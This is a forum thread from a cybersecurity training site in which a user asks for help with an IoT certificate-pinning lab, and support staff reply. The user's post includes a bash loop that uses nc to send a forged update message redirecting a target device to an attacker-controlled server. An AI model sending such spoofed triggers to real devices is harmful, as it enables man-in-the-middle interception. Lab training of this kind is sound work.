Forum Discussion

struc's avatar
struc
Icon for Bronze I rankBronze I
22 days ago

IoT & Embedded Devices: Certificate Underpinning

I am also stuck on Step 5 and having trouble with the trigger. I have self-signed certs, an HTTP server listening on 443 (bound to 0.0.0.0) as well as a sniffer for anything coming from the target. I have tried to trigger the target to connect using: 

for i in {1..5}; 
    do echo '{"Update":"1","ClientId":"AXG1337VFXL","Server Ip":"<KALI_IP>"}' | nc -u <TARGET_IP> 8080; 
    sleep 2; 
done

Can anyone point me in the right direction?

 

3 Replies

  • KieranRowley's avatar
    KieranRowley
    Icon for Community Manager rankCommunity Manager

    Hey struc​ I see it's been a few days since you asked your question and no one has been able to help yet. Let me ask some of my colleagues for a pointer...

  • ChrisKershaw's avatar
    ChrisKershaw
    Icon for Community Support rankCommunity Support

    Hey struc​ 

    I'm sorry for the delay in responding to your lab issue. 

    I'm pleased to confirm that the lab is working correctly, I've just tested it, and I was able to retrieve the token for Task 5 successfully.

    Firstly, ensure that in the terminal application, you are in the 'Desktop' directory. The command you will need to use this command to open up a new file window:  gedit exploit.py

    This is where you will need to enter and save the script.

    You're welcome to share the script with us in full, and we can check that you have it listed correctly if that will help? 

    Hopefully, this helps as a starting point with your attempt.

  • ChrisKershaw's avatar
    ChrisKershaw
    Icon for Community Support rankCommunity Support

    Hey struc​ 

    I just wanted to check in with you, to ask how you are getting on with your lab attempt? Do you require any further help at all?